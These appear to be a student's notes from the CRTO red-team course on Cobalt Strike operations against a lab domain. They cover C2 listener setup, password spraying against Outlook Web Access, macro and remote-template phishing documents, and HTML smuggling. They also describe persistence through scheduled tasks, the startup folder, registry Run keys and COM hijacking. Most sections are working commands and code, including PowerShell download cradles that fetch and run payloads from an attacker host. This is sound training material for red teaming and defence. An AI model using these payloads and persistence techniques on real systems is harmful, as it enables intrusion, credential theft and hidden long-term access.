CRTO Notes

This course aims to teach the fundamental concepts and skillsets required to get started in the field of red teaming.  We'll begin with some theory about how to plan and approach an engagement, and how each stage of the attack lifecycle can be tackled (from initial compromise to domain takeover).  Along the way, we'll highlight some tactics to avoid (and why) and suggest suitable alternatives.

Cobalt Strike

Starting the team server

running cobalt strike:

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

• 10.10.5.50 is the IP address of the Attacker Linux VM.
• Passw0rd! is the shared password used to connect from the Cobalt Strike client.
• webbug.profile is an example Malleable C2 profile (covered in more detail later).

Now, you can connect using the Cobalt Strike GUI. You can give it any alias and any username. Password should match the password of the teamserver as well as the IP address.

Creating a listener

There are 2 different types of listeners, Egress listeners and peer-to-peer listeners... Egress listeners are available in HTTP and DNS listeners

Egress Listeners

Egress Listeners Overview

• Enable Beacon communication outside the target network to the team server.
• Default types in Cobalt Strike: HTTP/S and DNS.

Managing Listeners

• Go to Cobalt Strike > Listeners or click the headphone icon.
• Options: Add, edit, remove, restart listeners.

HTTP Listener

• Function: Sends/receives C2 messages via HTTP GET/POST.
• Setup:
  1. Click Add, select Beacon HTTP, and name the listener.
  2. Add callback IP/domain in the HTTP Hosts box (+ button).
  3. Use DNS names (e.g., nickelviper.com); ensure they resolve to 10.10.5.50.
  4. Save → Port 80 starts listening (http started!).

Command to Check Listener

sudo ss -lntp

DNS Listener

• Function: Sends/receives C2 messages via DNS lookups (e.g., A, AAAA, TXT records).
• Setup:

  1. Create DNS records for nickelviper.com:

     • @ -> A -> 10.10.5.50
     • ns1 -> A -> 10.10.5.50
     • pics -> NS -> ns1.nickelviper.com

  2. DNS Beacon queries (e.g., <c2data>.pics.nickelviper.com) route to the team server.

  3. Test DNS lookup:

     dig @ns1.nickelviper.com test.pics.nickelviper.com +short

     Default response: 0.0.0.0.

OPSEC Tip

• Default 0.0.0.0 response can reveal the team server. Modify this in the Malleable C2 profile for stealth.

Peer-to-Peer (P2P) Listeners

Overview

• Purpose: Chain Beacons (parent-child) for stealth and to bypass network restrictions.
• Types: SMB and TCP.
• Traffic: Child Beacon → Parent Beacon → Team Server (doesn't leave the target network).

Commands Used

SMB Listener

• Function: Creates a named pipe for Beacon communication.
• Setup:
  1. Default pipe name: msagent_## (replace for OPSEC).
  2. Check active pipes for realistic names:

    `ls \\.\pipe\`
    

TCP Listener

• Function: Beacon binds to a port for communication.
• Setup:
  1. Choose port number and binding interface:
     • Localhost: 127.0.0.1
     • All interfaces: 0.0.0.0

OPSEC Tips

• Replace default SMB pipe names with app/Windows-like names.
• Use realistic ports/interfaces to blend in with legitimate traffic.

Payload Generation

Payload Menu Options

1. HTML Application
   • File: .hta
   • Usage: Social engineering (via browser).
   • Compatibility: Egress listeners, x86 only.
2. MS Office Macro
   • File: VBA code for MS Word/Excel.
   • Compatibility: Egress listeners, x86 & x64.
3. Stager Payload Generator
   • Formats: C, C#, PowerShell, Python, VBA.
   • Purpose: Custom payloads/exploits.
   • Compatibility: Egress listeners, x86 & x64.
4. Stageless Payload Generator
   • Formats: No PowerShell; allows exit function (process/thread).
   • Compatibility: Egress + P2P listeners, x86 & x64.
5. Windows Stager Payload
   • Output: Pre-compiled EXE, Service EXE, or DLL.
   • Compatibility: Egress listeners, x86 & x64.
6. Windows Stageless Payload
   • Output: Pre-compiled EXE, Service EXE, DLL, shellcode, PowerShell.
   • Compatibility: Egress + P2P listeners, x86 & x64.
7. Windows Stageless Generate All Payloads
   • Produces all stageless payloads for every listener (x86 & x64).

HTTP Beacon Payload

Launching and Monitoring

1. Run Payload: Launch http_x64.exe on the attacker desktop.
2. UI Appearance: Beacon metadata:
   • Sleep: Check-in interval (default: 60 seconds).
   • Last Check-in: Turns bold/italic after 3 missed check-ins.

Traffic Analysis with Wireshark

• Filter: http.
• Observe Beacon traffic:
  • GET request → Beacon checks for jobs.
  • 200 OK response → Team server sends NOP if no tasks.
• Follow HTTP Stream:
  • Red: Beacon request (metadata).
  • Blue: Server response (tasks).

Key Commands Used

1. List Available Commands:

   beacon> help

2. Change Directory:

   beacon> cd [path]

3. Print Working Directory:

   beacon> pwd

   Example Output:

   [*] Current directory is C:\Payloads

4. Adjust Check-in Frequency:

   beacon> sleep [seconds]

   Example:

   beacon> sleep 5 [*] Tasked beacon to sleep for 5s

OPSEC Tips

• Shorter check-ins (sleep 5) increase noise on the network, raising detection risks.
• DNS Beacons appear as "unknown" initially—use checkin command for metadata.
• Traffic Customization: Modify GET/POST traffic appearance in Malleable C2 profile.

Pivot Listeners

Overview

• Pivot Listener: Created from an existing Beacon, not via the usual Listeners menu.
• Purpose: Reverse operation compared to standard TCP listeners—existing Beacon binds to a port, and the new payload connects to it.

Steps to Create

1. Initiate Pivot Listener:

   • Right-click Beacon → Pivoting → Listener.
   • Payload type: beacon_reverse_tcp (only option available).
   • Listen Host & Port: Auto-populated (e.g., port 4444).

2. Verify Listener:

   beacon> run netstat -anop tcp

   Example Output:

   TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING [PID]

   • Match PID with the Beacon.

3. Generate Payloads:

   • Pivot listener now supports commands like spawn, elevate, jump, etc.
   • Reverse TCP Beacon appears instantly in the UI with directional connection shown in the graph view.

Stopping a Pivot Listener

• Navigate to Listeners menu → Highlight pivot listener → Click Remove.

Commands Recap

1. Create Pivot Listener: Right-click Beacon → Pivoting → Listener.

2. Check Listener Ports:

   beacon> run netstat -anop tcp

3. Stop Listener: Remove it from the Listeners menu.

Running Team Server as a Service

Purpose
Set up the Cobalt Strike Team Server to start automatically with the VM using a systemd service.

1. Create Systemd Unit File

   sudo vim /etc/systemd/system/teamserver.service

   Content:

   [Unit] Description=Cobalt Strike Team Server After=network.target StartLimitIntervalSec=0 [Service] Type=simple Restart=always RestartSec=1 User=root WorkingDirectory=/home/attacker/cobaltstrike ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile [Install] WantedBy=multi-user.target

2. Reload Systemd and Check Status

   sudo systemctl daemon-reload sudo systemctl status teamserver.service

   Expected Output:
   Service is inactive (dead) initially.

3. Start the Service

   sudo systemctl start teamserver.service sudo systemctl status teamserver.service

   Expected Output:
   Service becomes active (running), with console output confirming successful startup.

4. Enable Service on Boot

   sudo systemctl enable teamserver.service

   Expected Output:
   Systemd creates a symlink to ensure the service starts on VM boot.

Commands Recap

1. Create/Edit Service File:

   sudo vim /etc/systemd/system/teamserver.service

2. Reload Systemd:

   sudo systemctl daemon-reload

3. Start Service:

   sudo systemctl start teamserver.service

4. Enable on Boot:

   sudo systemctl enable teamserver.service

Verification

• Run sudo systemctl status teamserver.service to ensure it's active and running.
• Console output includes listener details and SSL hash, confirming proper startup.

External Recon

Two Main Types of Recon

1. Organisational Recon
   Focus: Gather intel on the organisation.

   • People: Names, roles, skills.
   • Structure: Org charts, business locations.
   • Relationships: Partnerships, vendors.

2. Technical Recon
   Focus: Identify systems and infrastructure.

- Public-facing assets: Websites, mail servers, remote access solutions.
- Defensive systems: Web proxies, email gateways, firewalls, antivirus, etc.

Recon Methods

1. Passive Recon

   • Relies on 3rd-party sources, avoiding direct contact with target systems.
   • Examples:
     • Google Dorking: Find exposed sensitive data.
     • LinkedIn: Employee details and skills.
     • Shodan: Search public devices.
     • Social Media: Public posts revealing internal information.

2. Active Recon

   • Involves direct interaction with target systems.
   • Examples:
     • Website Visits: Observe site structure and content.
     • Port Scanning: Identify open ports and services.
     • Banner Grabbing: Gather details about systems or services.

Key Considerations

• Risk: Active recon may trigger alerts; use with caution.
• Privacy: Mitigate exposure by using:
  • Proxy services
  • VPNs
  • TOR networks

Quick Tip: Passive recon is safer but slower; active recon is faster but riskier. Always balance according to your operational goals.

DNS Recon

Honoustly, you know what to do... There are a million tools for this. Sublist3r, crt.sh, spiderfoot, dnscan. Whatever

Google Dorks

You know what to do

Social Media Recon

This actually sounded pretty cool: https://github.com/vysecurity/LinkedInt

If you want to go further, try combination with Sherlock

Initial Access

Password spraying

Tool Setup

• MailSniper is a powerful tool for password spraying attacks, particularly effective for Office 365 and Exchange servers. First, ensure Defender's Real-time protection is disabled before using MailSniper.

• Import MailSniper.ps1

  PS C:\Users\Attacker> ipmo C:\Tools\MailSniper\MailSniper.ps1

Domain Enumeration

To find the NetBIOS name of the target domain:

• Use the Invoke-DomainHarvestOWA command.

  PS C:\Users\Attacker> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io

• Example output:

  The domain appears to be: CYBER or cyberbotic.io

Username Harvesting

Create a list of potential usernames based on names like "Bob Farmer" and "Isabel Yates." This can be done manually or with a script like namemash.py, which generates common username permutations:

• Example:

  bobfarmer, farmerbob, bob.farmer, farmer.bob, farmerb

• To automate:

  ubuntu@DESKTOP-3BSK7NO ~> ~/namemash.py names.txt > possible.txt

Username Validation (Timing Attack)

Use Invoke-UsernameHarvestOWA to perform a timing attack to check for valid usernames:

PS C:\Users\Attacker> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt

• Example Output:

  Potentially Valid! User: cyberbotic.io\bfarmer Potentially Valid! User: cyberbotic.io\iyates

Password Spraying Attack

Now that we have valid usernames, we can password spray them using a common password (e.g., Summer2022):

PS C:\Users\Attacker> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022

• Example Output:

  SUCCESS! User: cyberbotic.io\iyates Password: Summer2022

Post-Exploitation

After successfully obtaining credentials, you can perform further actions such as downloading the Global Address List (GAL):

PS C:\Users\Attacker> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt

• Example Output:

  bfarmer@cyberbotic.io iyates@cyberbotic.io jking@cyberbotic.io

OPSEC Considerations

• Account Lockout: Repeated password attempts could trigger account lockouts. Be cautious of too many attempts in a short period.
• Stealth: Use proxies or VPNs to obfuscate your real IP during active recon to minimize detection.

Post-Exploitation: Leveraging Compromised Email Access

1. Logging into OWA

After obtaining valid credentials from the password spraying attack, open a browser on the Attacker Desktop and navigate to:

🔗 https://mail.cyberbotic.io

Login using the compromised credentials:

• Even if the label says Domain\username, using username@domain (e.g., iyates@cyberbotic.io) works.

2. Reconnaissance via Email Access

Once inside the compromised mailbox, several opportunities arise:

Search for Sensitive Information

• Look for emails containing:
  • Login credentials (e.g., "Here are your VPN credentials.")
  • Internal documentation (e.g., "Company security policy.pdf")
  • Server details (e.g., "Production DB credentials")

Leverage Email Trust for Phishing

• Send internal phishing emails pretending to be the compromised user.
• Attach malicious documents (e.g., macro-infected Word files).
• Send fake IT support requests asking for password resets.

Modify and Re-Send Attachments

• Download internal documents from the mailbox.
• Backdoor them (e.g., embed a malicious macro in a Word file).
• Send them back to another user, disguised as a legitimate response.

OPSEC Considerations

• Avoid triggering security alerts (e.g., logging in from unexpected locations).
• Use the compromised user's language/tone to stay undetected.
• Monitor sent items and inbox rules—admins may have alerting rules in place.

By maintaining stealth, a compromised mailbox can be a powerful foothold for further lateral movement and social engineering.

Payload Delivery in Phishing Attacks

To gain a foothold on a phished user's system, there are two primary methods of delivering a payload:

1. Send a URL where the payload can be downloaded.
2. Attach the payload directly to the phishing email.

Mark of the Web (MOTW)

A key distinction between these methods is how Windows handles files downloaded from the internet.

Any file downloaded via a browser (outside a trusted zone) gets tagged with MOTW. This adds a Zone Identifier to the file, marking it as coming from an untrusted location.

Checking MOTW with PowerShell

PS C:\Users\bfarmer\Downloads> gc .\test.txt -Stream Zone.Identifier [ZoneTransfer] ZoneId=3 HostUrl=http://nickelviper.com/test.txt

Zone Identifiers:

Security Implications

• Files with MOTW are scrutinized by Windows SmartScreen and Office Protected View.
• Users might have to click through warnings, reducing the chances of a successful phish.
• If MS Office blocks macros from the Internet, macro-enabled documents won't execute—even if the user wants to run them.

Bypassing MOTW via Internal Emails

Files sent internally through a compromised Exchange mailbox are not tagged with MOTW, avoiding these security warnings.

This makes internal phishing a powerful method to escalate access within an organization.

VBA Macros and PowerShell Payloads

VBA (Visual Basic for Applications) is commonly used to automate tasks in Microsoft Office applications like Word and Excel. However, threat actors can use VBA macros to embed malicious code in documents. These macros are executed when the document is opened, making them an effective way to deliver payloads.

1. Creating a VBA Macro in Word

• Steps:

  1. Open Word on the Attacker Desktop.
  2. Go to View > Macros > Create.
  3. Change the "Macros in" field to Document 1.
  4. Enter a name for the macro and click Create.
  5. For the macro to trigger automatically when the document opens, use the AutoOpen subroutine.

• Macro Code Example:

  Copy

  Sub AutoOpen()     
      Dim Shell As Object     
      Set Shell = CreateObject("wscript.shell")     
      Shell.Run "notepad" 
  End Sub
  

• Explanation:

  • wscript.shell allows execution of OS commands, in this case, opening Notepad. You can replace notepad with a Beacon payload or other malicious code.

2. Using Cobalt Strike PowerShell Payload

• PowerShell Payload Setup:

  1. In Cobalt Strike, navigate to Attacks > Scripted Web Delivery (S) to generate a PowerShell payload.
  2. Configure the URI path, for example /a, and launch it to generate the PowerShell one-liner.

• PowerShell One-Liner:

  Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

3. Preparing the Document for Delivery

• Remove Document Properties:

  1. Go to File > Info > Inspect Document > Inspect Document.
  2. Click Inspect, then Remove All next to Document Properties and Personal Information to prevent leakage of your username.

• Save as .doc Format:

1. Save the document as `Word 97-2003 (.doc)` instead of `.docx` or `.docm` to avoid flags related to macro-enabled extensions.

4. Uploading the Document

• Upload to Team Server:
  1. Go to Site Management > Host File and upload the .doc file containing the payload.

5. Phishing Email with Payload Link

• Create Phishing Email:
  1. Copy HTML template content into the OWA (Outlook Web App) text editor.
  2. Modify the text placeholders and the URL to point to the payload, for example, http://nickelviper.com/ProductReport.doc.

6. Delivering the Payload

• Send the Email:
  Log into Workstation 2 as Bob, open Outlook, and send the phishing email containing the document link.

• User Interaction:

  1. When Bob opens the email, the document will download via the browser and will have the "Mark of the Web" (MOTW), triggering Protected View in Microsoft Word.
  2. The user must click Enable Editing and Enable Content to execute the macro and run the PowerShell payload.

7. Execution of Beacon

Once the user enables the content, a PowerShell window will briefly open, and the Cobalt Strike Beacon will be executed. The attacker gains a foothold on the compromised system.

Remote Template Injection in Microsoft Word

Remote Template Injection is a technique where an attacker sends a benign document that downloads and loads a malicious template upon opening. This template can contain a macro, leading to code execution.

1. Creating a Malicious Remote Template

1. Open Word on the Attacker Desktop.
2. Create a new blank document and insert your desired macro.
3. Save the document as a Word 97-2003 Template (.dot) in C:\Payloads.
4. Use Cobalt Strike to host this template at http://nickelviper.com/template.dot.

2. Creating a Document Referencing the Remote Template

1. Open Word and create a new blank document.
2. Add any content you want (optional).
3. Save the document as a .docx file in C:\Payloads.
4. Open C:\Payloads in File Explorer, right-click the .docx, and select 7-Zip > Open archive.
5. Navigate to word > _rels, right-click on settings.xml.rels, and select Edit.

3. Modifying the Template Reference in XML

1. Locate the Target entry, which points to the original local template:

   Target="file:///C:\Users\Attacker\Documents\Custom%20Office%20Templates\Blank%20Template.dotx"

2. Replace it with the remote URL:

   Target="http://nickelviper.com/template.dot"

3. Save the changes and close the file.

4. Sending the Malicious Document

• Email the modified .docx file to Bob.
• When Bob opens the file, it will fetch and execute the macro from the hosted .dot template.
• A macro warning will appear, but once enabled, it will execute the payload and establish a Cobalt Strike Beacon.

5. Automating the Process

Instead of manually modifying the XML, you can use John Woodman’s Python tool:

python3 remoteinjector.py -w http://nickelviper.com/template.dot /mnt/c/Payloads/document.docx

• The tool injects the URL into the document and saves a new version:

  URL Injected and saved to /mnt/c/Payloads/document_new.docx

HTML Smuggling: Bypassing Content Filters with JavaScript

HTML smuggling is a technique that embeds malicious payloads into an HTML file, allowing browsers to reconstruct them at runtime. This bypasses email and web filters that scan for direct download links.

1. Traditional Download vs. HTML Smuggling

A phishing email might include a direct download link:

<a href="http://attacker.com/file.doc">Download Me</a>

• Email and web scanners detect and scan such links.
• The file may be removed or quarantined.

HTML smuggling, instead, embeds the payload within JavaScript, constructing the file on the fly.

2. HTML Smuggling Template

This simple template (based on work by Stan Hegt) reconstructs and downloads a file when opened in a browser.

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>

        <script>
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array(len);
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }

        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'octet/stream'});
        var fileName = 'test.txt';

        if(window.navigator.msSaveOrOpenBlob) {
            window.navigator.msSaveBlob(blob, fileName);
        } else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>

• The JavaScript decodes a Base64-encoded file and downloads it.
• The scanner sees only text/html, without direct download links.

3. Encoding a File for HTML Smuggling

To encode a file for embedding:

echo -en "This is a smuggled file" | base64

This produces:

VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=

Replace the file variable in the script with the encoded string.

4. Hosting the HTML File

Use a Python HTTP server to serve the file:

python3 -m http.server 8080

• The file will be available at http://attacker-ip:8080/smuggle.html.

5. Browser Behavior & Security Mechanisms

• The file retains Mark of the Web (MOTW), causing Protected View warnings.

• Example of checking MOTW in PowerShell:

  gc .\test.txt -Stream Zone.Identifier

Output:

`[ZoneTransfer] ZoneId=3 ReferrerUrl=http://nickelviper.com/smuggle.html HostUrl=http://nickelviper.com/`

This technique works within modern browsers but is subject to browser security warnings, especially for executable files.

Host Recon

Situational Awareness Before Post-Exploitation

Before diving into post-exploitation, it's crucial to assess the current environment. Every action carries a risk of detection, and understanding both your capabilities and the defender’s capabilities can help minimize that risk.

1. Enumerating Security Controls

We need to identify what protections are in place before executing any commands. This can include:

• Antivirus (AV) / Endpoint Detection & Response (EDR) – Are security agents running? What vendors?
• Windows Audit Policies – Are key actions being logged?
• PowerShell Logging – Are commands being recorded in event logs?
• Event Forwarding – Are logs being sent to a SIEM or monitored externally?

Why does this matter?
Triggering an AV alert or getting flagged in a SIEM could burn access before any useful action is taken.

2. Defence in Depth

The blue team follows the principle of Defence in Depth – multiple, independent security layers throughout a system.

• If one control fails, others remain active to prevent compromise.
• This includes AV, EDR, logging, behavioral detection, and anomaly monitoring.

Example:
Even if you evade an AV scan, you might still trigger an anomaly detection rule due to unusual system behavior.

3. Offence in Depth

Red teamers adopt a similar mindset:

• Always have multiple ways to achieve the same goal.
• Adapt tactics based on detected security controls.

Example:

• If PowerShell logging is enabled, running a favorite script might get logged.
• Alternative approaches:
  • Use .NET assemblies instead of PowerShell.
  • Use C# payloads that achieve the same result without detection.

A skilled operator is never limited to a single tool or technique.

Process Enumeration with ps

Listing running processes can reveal custom applications and security solutions active on the system. This helps identify potential defenses and attack paths.

Command:

beacon> ps

Example Output:

 PID   PPID  Name                     Arch  Session     User
 ---   ----  ----                     ----  -------     ----
 2492  680   MsMpEng.exe
 2668  680   Sysmon64.exe
 2740  680   elastic-endpoint.exe
 2748  680   elastic-agent.exe

Key Observations

1. Security Software Identified

   • MsMpEng.exe → Microsoft Defender
   • Sysmon64.exe → Sysmon (Advanced Logging)
   • elastic-endpoint.exe & elastic-agent.exe → Elastic Security Stack (EDR/SIEM Logging)

2. Parent/Child Relationships

   • Indentation shows process hierarchy (e.g., powershell.exe running under another process).
   • Helps spot malicious or highly monitored processes.

3. Visibility Limitations

- Running as a **standard user (medium integrity)** means **some details (arch, session, user) are hidden** for system-owned processes.

Next Steps

• If security tools are present, avoid obvious detection triggers.
• Consider alternative execution methods (e.g., using .NET over PowerShell if logging is enabled).
• Investigate non-standard services (Service 1.exe, Service 2.exe, etc.) for possible privilege escalation.

Seatbelt - Host Enumeration Tool

Overview - Seatbelt:

A C# tool for collecting security-related host information. - Checks: OS info, AV, AppLocker, LAPS, PowerShell logging, audit policies, .NET versions, firewall rules, and more.

Usage

```powershell execute-assembly C:\Path\To\Seatbelt.exe -group=system`

Key Findings

AntiVirus

• Detects installed AV engines and their configurations.

AppLocker

• Checks if AppLocker is running.
• If AppIDSvc is not running, AppLocker is inactive.

.NET Framework

• Enumerates installed .NET versions.
• Checks if AMSI (Anti-Malware Scan Interface) is enabled.

Internet Settings

• Identifies proxy settings.
• Proxy configurations may affect C2 communication.

LAPS (Local Administrator Password Solution)

• Determines if LAPS is enabled or not.

OS Information

• Enumerates OS version, architecture, hostname, domain, and user privileges.
• If a user is a local admin but running in medium integrity, UAC bypass might be possible.

PowerShell

• Lists installed PowerShell versions.
• If PowerShell v2.0 is missing a required CLR version, it won't function.

User Account Control (UAC)

• Checks UAC enforcement settings.
• Determines admin consent behavior for non-Windows binaries.

Web Proxy Implications for C2

Web Categorization

• Domains are categorized for filtering.
• Blocked categories (e.g., social media, gambling) prevent communication.
• Solutions:
  • Use a domain with a desirable category.
  • Request a category change via third-party services (e.g., Bluecoat).

HTTPS Offloading

• Some proxies decrypt and inspect HTTPS traffic.
• Can impact C2 traffic visibility.
• Certificate pinning in C2 tools (e.g., Covenant) may mitigate this but risks detection.

Content Filtering & AV Scanning

• Proxies may inspect and block certain file types (.exe, .dll, .ps1).
• Some may scan for malicious payloads before allowing downloads.

Proxy Authentication

• Many proxies require authentication (e.g., NTLM, Kerberos, LDAP).
• Typically, Domain Users are allowed, while SYSTEM accounts may be blocked.
• HTTP(S) Beacons running as SYSTEM might fail due to authentication restrictions.
• This provides concise, reusable notes without environment-specific details.

Host Persistance

Overview

• Maintains access to a compromised system after initial exploitation.
• Essential for long-term engagements but carries a risk of detection.
• Can be userland (current user) or elevated (SYSTEM/admin).

Methods of Persistence

• Registry Autoruns (HKCU / HKLM)
• Scheduled Tasks
• Startup Folder

Tools & Execution

• Cobalt Strike: No built-in persistence commands.
• SharPersist: C# tool for persistence by FireEye.

Usage:

execute-assembly C:\Path\To\SharPersist.exe

Persistence must be carefully balanced to avoid detection while ensuring continued access.

Windows Task Scheduler Persistence

Overview

• Task Scheduler: Creates tasks to execute at specified triggers (time, user logon, idle, etc.).
• Persistence: Useful for ensuring payloads execute periodically (e.g., hourly).

Steps for Creating Scheduled Task with PowerShell Payload

1. Encode PowerShell Command to Base64

   • Encode payload in Unicode and then to Base64:

   $str = 'IEX ((new-object net.webclient).downloadstring("http://example.com/a"))' [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

2. Command for Scheduled Task in Cobalt Strike:

   • Use SharPersist to create a scheduled task:

   execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <Base64Command>" -n "Updater" -m add -o hourly

   • Options:
     • -t: Technique (schtask)
     • -c: Command to execute
     • -a: Arguments for the command
     • -n: Task name
     • -m: Action (add, remove, check, list)
     • -o: Frequency (hourly, etc.)

3. Verification:

   • Open Task Scheduler to confirm the task has been added.
   • You can run the task immediately by selecting it and clicking Run.

Note:

• Scheduled tasks provide a reliable method to maintain access.
• The task will execute periodically based on the trigger, ensuring continuous payload execution.

Startup Folder Persistence

• Startup Folder: Automatically launches applications, files, and shortcuts when a user logs in. Often used to set up user environments (e.g., wallpaper, shortcuts).

Steps for Creating Startup Folder Persistence

1. Command for Startup Folder Persistence in Cobalt Strike:

   execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <Base64Command>" -f "UserEnvSetup" -m add

   • Options:
     • -t: Technique (startupfolder)
     • -c: Command to execute
     • -a: Arguments for the command
     • -f: Filename for the LNK file (shortcut in the startup folder)
     • -m: Action (add)

2. Verification:

   • Check the startup folder (C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup) for the dropped LNK file (UserEnvSetup.lnk).
   • Simulate a logoff and logon by selecting Shut down or sign out > Sign out in Guacamole. Reconnect to trigger the payload execution.

Note:

• Startup folder persistence ensures that the payload executes every time the user logs in.
• The dropped shortcut (.lnk file) can be a reliable method for maintaining access.

AutoRun Persistence (HKCU and HKLM)

• AutoRun Values: Located in the Windows registry (HKCU and HKLM), these values allow applications to start automatically when the system boots. Commonly used for starting software updaters, download assistants, and utilities.

Steps for Registry Persistence with AutoRun

1. Upload and Rename Payload:

   beacon> cd C:\ProgramData beacon> upload C:\Payloads\http_x64.exe beacon> mv http_x64.exe updater.exe

2. Create Registry Persistence:

   execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

   • Options:
     • -t: Persistence technique (reg)
     • -c: Command to execute (payload path)
     • -a: Command arguments (/q /n)
     • -k: Registry key to modify (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
     • -v: Name of the registry value to create (Updater)
     • -m: Action (add)

3. Verification:

   • Reboot the machine to test if the persistence works.
   • Upon login, the payload should execute from the registry entry.

Key Notes:

• HKCU: Triggers when the user (owner of the hive) logs in.
• HKLM: Triggers when any user logs in but executes in the context of the user, not SYSTEM.

COM Object Hijacking Persistence (Abandoned Keys and Task Scheduler)

• Abandoned Keys: A safer strategy for hijacking COM objects involves targeting abandoned registry keys where applications attempt to load objects that don't exist. Using Process Monitor, you can filter for RegOpenKey operations where the result is NAME NOT FOUND and the path ends with InprocServer32.

Steps for Hijacking Abandoned COM Objects

1. Launch Process Monitor:
   Start procmon64.exe on the Attacker Desktop.

   • Filter for RegOpenKey operations where the result is NAME NOT FOUND and the path ends with InprocServer32.

2. Simulate Activity:
   To speed up collection, interact with the system (click random things, launch applications, etc.) and capture around 500 events.

3. Find CLSID of Interest:

   • Look for CLSIDs loaded by DllHost.exe, such as:

     HKCU\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32

4. Verify CLSID Presence:

   PS C:\Users\Attacker> Get-Item -Path "HKLM:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"

   • Result shows the entry exists in HKLM but not in HKCU:

   InprocServer32 (default) : C:\Windows\System32\thumbcache.dll

5. Create Registry Entry:

   • Add the missing registry entry in HKCU and point to a payload DLL:

   PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll" PS C:\Users\Attacker> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

6. Exploit:

   • When DllHost.exe loads the COM entry, it triggers the payload (Beacon).

7. Cleanup:

   • Remove the registry entries and delete the payload DLL to clean up the hijack.

Task Scheduler Hijacking

• Hijackable Tasks: Many default Windows tasks use COM objects via the Task Scheduler with custom triggers. These tasks can provide predictable execution times, making them ideal for persistence.

Steps to Find Hijackable Tasks

1. List Scheduled Tasks:

$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks) { if ($Task.Actions.ClassId -ne $null) { if ($Task.Triggers.Enabled -eq $true) { if ($Task.Principal.GroupId -eq "Users") { Write-Host "Task Name: " $Task.TaskName Write-Host "Task Path: " $Task.TaskPath Write-Host "CLSID: " $Task.Actions.ClassId Write-Host } } } }

    
    - This will list tasks with CLSIDs that can be hijacked.
2. **Example Output**:
    
    `Task Name:  SystemSoundsService Task Path:  \Microsoft\Windows\Multimedia\ CLSID:  {2DEA658F-54C1-4227-AF9B-260AB5FC3543}  Task Name:  MsCtfMonitor Task Path:  \Microsoft\Windows\TextServicesFramework\ CLSID:  {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}`
    
3. **Target CLSID in Registry**:
    
    - For the `MsCtfMonitor` task:
    
    `PS C:\> Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"`
    
    - Verify it’s implemented in `HKLM`, but not in `HKCU`:
    
    `PS C:\> Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"`
    
4. **Hijack the COM Object**:
    
    - Create the registry entry in `HKCU` to point to your DLL and gain persistence when any user logs in:
``` powershell
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
PS C:\Users\Attacker> New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Payloads\http_x64.dll"
PS C:\Users\Attacker> New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both"

5. Persistence:

   • The COM object will now be loaded every time the user logs in.

Privilege Escalation

Host privilege escalation allows us to elevate privileges from that of a standard user to Administrator. It’s not a necessary step, as we’ll see in later modules how it's possible to obtain privileged credentials and move laterally in the domain without having to "priv esc" first.

However, elevated privileges can provide a tactical advantage by allowing you to leverage some additional capabilities. For example, dumping credentials with Mimikatz, installing sneaky persistence, or manipulating host configurations such as the firewall.

